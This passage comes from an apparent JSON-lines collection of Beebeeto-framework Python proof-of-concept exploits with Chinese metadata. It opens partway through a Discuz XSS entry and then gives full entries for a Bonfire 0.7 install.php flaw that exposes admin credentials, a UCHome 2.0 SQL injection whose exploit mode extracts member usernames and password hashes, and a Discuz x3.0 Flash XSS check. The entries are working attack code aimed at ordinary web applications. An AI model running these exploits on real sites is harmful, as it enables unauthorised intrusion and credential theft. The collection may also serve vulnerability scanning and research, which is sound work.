messagehandle_,alert(/\"+keyword+\"/)\"\r\n if key in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = vul_url\r\n args['poc_ret']['payload'] = payload\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "post.php\u4e2dhandlekey\u53d8\u91cf\u4f20\u5165global.func.php\u540e\u8fc7\u6ee4\u4e0d\u4e25,\u5bfc\u81f4\u53cd\u5c04XSS\u6f0f\u6d1e\u7684\u4ea7\u751f", "app_name": "Discuz", "id": "poc-2014-0009", "layer4_protocol": null}
{"create_date": "2014-09-17 17:26:28", "name": "Bonfire 0.7 /install.php \u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 4, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Bonfire,\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0005',\r\n 'name': 'Bonfire 0.7 /install.php \u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2014-08-01',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Bonfire', \r\n 'vul_version': ['0.7'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Bonfire', '\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e'],\r\n 'desc': '\u7531\u4e8einstall.php\u5b89\u88c5\u6587\u4ef6\u5bf9\u5df2\u5b89\u88c5\u7684\u7a0b\u5e8f\u8fdb\u884c\u68c0\u6d4b\u540e\u6ca1\u6709\u505a\u597d\u540e\u7eed\u5904\u7406\uff0c\u5bfc\u81f4\u6267\u884c/install/do_install\u7684\u65f6\u5019\u5f15\u53d1\u91cd\u5b89\u88c5\u800c\u66b4\u9732\u7ba1\u7406\u5458\u4fe1\u606f\u3002',\r\n 'references': ['http://www.mehmetince.net/ci-bonefire-reinstall-admin-account-vulnerability-analysis-exploit/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/index.php/install/do_install'\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n try:\r\n content = urllib2.urlopen(urllib2.Request(verify_url)).read()\r\n except Exception, e:\r\n content = ''\r\n 
args['success'] = False\r\n return args\r\n\r\n if content:\r\n regular = re.findall('Your Email:\\s+<b>(.*?)</b><br/>\\s+Password:\\s+<b>(.*?)</b>', content)\r\n if regular:\r\n (username, password) = regular[0]\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['Username'] = username\r\n args['poc_ret']['Password'] = password\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "\u7531\u4e8einstall.php\u5b89\u88c5\u6587\u4ef6\u5bf9\u5df2\u5b89\u88c5\u7684\u7a0b\u5e8f\u8fdb\u884c\u68c0\u6d4b\u540e\u6ca1\u6709\u505a\u597d\u540e\u7eed\u5904\u7406\uff0c\u5bfc\u81f4\u6267\u884c/install/do_install\u7684\u65f6\u5019\u5f15\u53d1\u91cd\u5b89\u88c5\u800c\u66b4\u9732\u7ba1\u7406\u5458\u4fe1\u606f\u3002", "app_name": "Bonfire", "id": "poc-2014-0005", "layer4_protocol": null}
{"create_date": "2014-09-17 16:49:20", "name": "UCHome 2.0 /source/cp_profile.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 0, "author": "win95", "rank": 6, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "UCenter Home,SQL,SQLinjection,SQL\u6ce8\u5165\u6f0f\u6d1ePOC", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0004', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'UCHome 2.0 /source/cp_profile.php SQL\u6ce8\u5165\u6f0f\u6d1e POC', # \u540d\u79f0\r\n 'author': 'windows95', # \u4f5c\u8005\r\n 'create_date': '2014-08-05', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\u6240\u4f7f\u7528\u7684\u7b2c\u4e09\u5c42\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz UCenter Home', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['2.0'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'SQL Injection', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['UCenter Home', 'sql', 'SQL\u6ce8\u5165\u6f0f\u6d1e'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'UCHOME \u4fee\u6539\u4e2a\u4eba\u8d44\u6599\u5904 info \u53c2\u6570\u672a\u7ecf\u8fc7\u8fc7\u6ee4\u5bfc\u81f4 SQL \u6ce8\u5165\u6f0f\u6d1e\u7684\u53d1\u751f\uff0c\u53ef\u4ee5\u83b7\u53d6\u7ba1\u7406\u5458\u7684\u8d26\u53f7\u5bc6\u7801\u3002', # 
\u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-069193', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n def _init_user_parser(self): # \u5b9a\u5236\u547d\u4ee4\u884c\u53c2\u6570\r\n self.user_parser.add_option('-c','--cookie',\r\n action='store', dest='cookie', type='string', default=None,\r\n help='this poc need to login, so special cookie '\r\n 'for target must be included in http headers.')\r\n\r\n @classmethod\r\n def verify(cls, args): # \u5b9e\u73b0\u9a8c\u8bc1\u6a21\u5f0f\u7684\u4e3b\u51fd\u6570\r\n payload = 'name=&marry=1&friend%5Bmarry%5D=0&birthyear=1989&birthmonth=2&birthday=1&friend%5B' \\\r\n 'birth%5D=0&blood=A&friend%5Bblood %5D=0&birthprovince=%C7%E0%BA%A3&birthcity=%B5%C' \\\r\n '2%C1%EE%B9%FE&friend%5Bbirthcity%5D=0&resideprovince=%C7%E0%BA%A3&residec ity=%B5%' \\\r\n 'C2%C1%EE%B9%FE&friend%5Bresidecity%5D=0&profilesubmit=%B1%A3%B4%E6&formhash={hash}' \\\r\n '&info[0\\',0,(select (1) from mysql.user where 1%3d1 and (SELECT 1 FROM (select cou' \\\r\n 'nt(*),concat(floor(rand(0)*2),(substring((Select (md5(56311223))),1,62))) a from i' \\\r\n 'nformation_schema.tables group by a)b)))#]=aaa'\r\n\r\n vul_url = '{url}/cp.php?ac=profile&op=info&ref'.format(url=args['options']['target'])\r\n hash_url = '{url}/cp.php?ac=profile&op=base'.format(url=args['options']['target'])\r\n match_hash = re.compile('name=\"formhash\" value=\"([\\d\\w]+)\"')\r\n\r\n if args['options']['verbose']: # \u662f\u5426\u9700\u8981\u8f93\u51fa\u8be6\u7ec6\u4fe1\u606f\r\n print '[*] {url} - Getting formhash ...'.format(url=args['options']['target'])\r\n request = urllib2.Request(hash_url, headers={'Cookie': args['options']['cookie']}) # \u8c03\u7528\u4f20\u5165\u7684cookie\r\n response = urllib2.urlopen(request).read()\r\n form_hash = match_hash.findall(response)\r\n if not form_hash:\r\n args['success'] = False\r\n return args\r\n raise Exception(\"Get the formhash fail!\")\r\n\r\n if args['options']['verbose']:\r\n print '[*] {url} - The 
formhash is {form_hash}'.format(url=args['options']['target'], form_hash=form_hash[0])\r\n print '[*] {url} - Executing payload ...'.format(url=args['options']['target'])\r\n request = urllib2.Request(url=vul_url, headers={'Cookie': args['options']['cookie']}, data=payload.format(hash=form_hash[0]))\r\n response = urllib2.urlopen(request).read()\r\n if '14c711768474fac3bf03094625bc1aeaa' in response:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = args['options']['target']\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n @classmethod\r\n def exploit(cls, args): # \u5b9e\u73b0exploit\u6a21\u5f0f\u7684\u4e3b\u51fd\u6570\r\n vul_url = '{url}/cp.php?ac=profile&op=info&ref'.format(url=args['options']['target'])\r\n hash_url = '{url}/cp.php?ac=profile&op=base'.format(url=args['options']['target'])\r\n match_hash = re.compile('name=\"formhash\" value=\"([\\d\\w]+)\"')\r\n\r\n payload = 'name=&marry=1&friend%5Bmarry%5D=0&birthyear=1989&birthmonth=2&birthday=1&friend%5B' \\\r\n 'birth%5D=0&blood=A&friend%5Bblood %5D=0&birthprovince=%C7%E0%BA%A3&birthcity=%B5%C' \\\r\n '2%C1%EE%B9%FE&friend%5Bbirthcity%5D=0&resideprovince=%C7%E0%BA%A3&residec ity=%B5%' \\\r\n 'C2%C1%EE%B9%FE&friend%5Bresidecity%5D=0&profilesubmit=%B1%A3%B4%E6&formhash={hash}' \\\r\n '&info[0\\',0,(select (1) from mysql.user where 1%3d1 and (SELECT 1 FROM (select cou' \\\r\n 'nt(*),concat(floor(rand(0)*2),(substring((Select (select concat(username,0x3a3a,pa' \\\r\n 'ssword) from uchome_member limit 0,1)),1,62))) a from information_schema.tables gr' \\\r\n 'oup by a)b)))#]=aaa'\r\n if args['options']['verbose']:\r\n print '[*] {url} - Getting formhash ...'.format(url=args['options']['target'])\r\n request = urllib2.Request(hash_url, headers={'Cookie': args['options']['cookie']})\r\n response = urllib2.urlopen(request).read()\r\n form_hash = match_hash.findall(response)\r\n if not form_hash:\r\n args['success'] = False\r\n return args\r\n raise Exception(\"Get the 
formhash fail!\")\r\n if verbose:\r\n print '[*] {url} - The formhash is {form_hash}'.format(url=args['options']['target'], form_hash=form_hash[0])\r\n print '[*] {url} - Executing payload ...'.format(url=args['options']['target'])\r\n request = urllib2.Request(url=vul_url, headers={'Cookie': args['options']['cookie']}, data=payload.format(hash=form_hash[0]))\r\n response = urllib2.urlopen(request).read()\r\n match_data = re.compile('entry \\'1(.*)::([\\w\\d]{32})\\' for')\r\n data = match_data.findall(response)\r\n\r\n if data:\r\n args['success'] = True\r\n args['poc_ret']['username'] = data[0][0]\r\n args['poc_ret']['password'] = data[0][1]\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "UCHOME \u4fee\u6539\u4e2a\u4eba\u8d44\u6599\u5904 info \u53c2\u6570\u672a\u7ecf\u8fc7\u8fc7\u6ee4\u5bfc\u81f4 SQL \u6ce8\u5165\u6f0f\u6d1e\u7684\u53d1\u751f\uff0c\u53ef\u4ee5\u83b7\u53d6\u7ba1\u7406\u5458\u7684\u8d26\u53f7\u5bc6\u7801\u3002", "app_name": "Discuz", "id": "poc-2014-0004", "layer4_protocol": null}
{"create_date": "2014-09-17 15:56:07", "name": "Discuz x3.0 /static/image/common/focus.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 4, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Discuz,XSS,Flash XSS", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0001',\r\n 'name': 'Discuz x3.0 /static/image/common/focus.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2014-08-01',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz', \r\n 'vul_version': ['x3.0'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Discuz!', 'xss', 'flash xss'],\r\n 'desc': 'DiscuzX3.0 static/image/common/focus.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002',\r\n 'references': ['http://www.ipuman.com/pm6/137/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n flash_md5 = \"c16a7c6143f098472e52dd13de85527f\"\r\n file_path = \"/static/image/common/focus.swf\"\r\n verify_url = args['options']['target'] + file_path\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n md5_value = md5.new(content).hexdigest()\r\n if md5_value in flash_md5:\r\n args['success'] = True\r\n args['poc_ret']['xss_url'] = verify_url\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n exploit = 
verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "\u6b64\u6f0f\u6d1e\u51fa\u73b0\u5728\uff1aDiscuz_X3.0_SC_GBK \\upload\\static\\image\\common\\focus.swf", "app_name": "Discuz", "id": "poc-2014-0001", "layer4_protocol": null}